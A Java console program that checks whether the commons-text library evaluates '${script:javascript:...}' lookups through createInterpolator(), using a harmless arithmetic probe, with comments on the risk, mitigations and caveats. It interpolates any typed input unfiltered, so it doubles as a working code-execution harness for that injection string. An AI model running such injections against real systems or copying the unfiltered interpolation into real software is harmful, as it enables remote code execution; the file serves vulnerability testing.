DemoApplication.java
package com.example.demo;
import org.apache.commons.text.StringSubstitutor;
import java.util.Scanner;
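/**
 * Console check for whether the commons-text library on the classpath evaluates
 * {@code ${script:...}} lookups during string interpolation.
 *
 * <p>The program reads one line from standard input, passes it to the
 * substitutor returned by {@link StringSubstitutor#createInterpolator()}, and
 * prints the result. With the default input, an output of {@code 519} means the
 * script lookup was evaluated.
 *
 * <p>Why this matters for a reviewer: {@code createInterpolator()} enables the
 * library's default set of lookups. In commons-text releases where the script
 * lookup is part of that default set, any string handed to {@code replace(...)}
 * can run code, so an application that interpolates untrusted input this way is
 * exposed. Mitigations are to upgrade to a commons-text release that disables
 * the script, dns and url lookups by default, and to avoid interpolating
 * untrusted input at all (build a {@code StringSubstitutor} over an explicit
 * value map instead of the default interpolator).
 *
 * <p>Caveat: a result other than {@code 519} does not prove the library is
 * patched. The script lookup depends on a JavaScript engine being available in
 * the running JVM, so the same library can show a negative result on a JDK that
 * ships without one. Confirm the commons-text version from the dependency tree.
 *
 * <p>Run this only against your own test environment: whatever is typed at the
 * prompt is interpolated without any filtering.
 */
public class DemoApplication {

    /** Default probe: an arithmetic expression with a known result and no side effects. */
    private static final String DEFAULT_POC_STRING = "${script:javascript:195 + 324}";

    /** Value the default probe evaluates to (195 + 324) when the script lookup is active. */
    private static final int DEFAULT_POC_RESULT = 519;

    /** Visual separator printed between sections of the console output. */
    private static final String SEPARATOR = "===============================================================================================================================================================================================";

    /**
     * Prompts for an input string, interpolates it, and prints the outcome.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        // createInterpolator() turns on the library's default lookups; this is
        // the call whose behaviour the check is about.
        StringSubstitutor stringSubstitutor = StringSubstitutor.createInterpolator();

        System.out.println(SEPARATOR);
        // Built from the constant so the prompt cannot drift from the real default.
        System.out.println("Enter your exploit string (press Enter to use the default of '"
                + DEFAULT_POC_STRING + "'): ");

        // Not closed on purpose: closing the Scanner would also close System.in.
        Scanner in = new Scanner(System.in);
        // nextLine() throws NoSuchElementException on end-of-input (closed or
        // empty stdin, e.g. when run non-interactively); treat that as "use the
        // default". nextLine() never returns null, so only emptiness is checked.
        String exploitString = in.hasNextLine() ? in.nextLine() : "";
        if (exploitString.isEmpty()) {
            exploitString = DEFAULT_POC_STRING;
        }

        // The input is interpolated verbatim, with no validation.
        String output = stringSubstitutor.replace(exploitString);

        System.out.println(SEPARATOR);
        System.out.printf("Exploiting PoC with the exploit string '%s'%n", exploitString);
        System.out.println(SEPARATOR);
        System.out.println("PoC Output:");
        System.out.println(output);
        System.out.println(SEPARATOR);
        System.out.printf("If your output for the default input is %d, then your app is exploitable.%n",
                DEFAULT_POC_RESULT);
        System.out.println(SEPARATOR);
    }
}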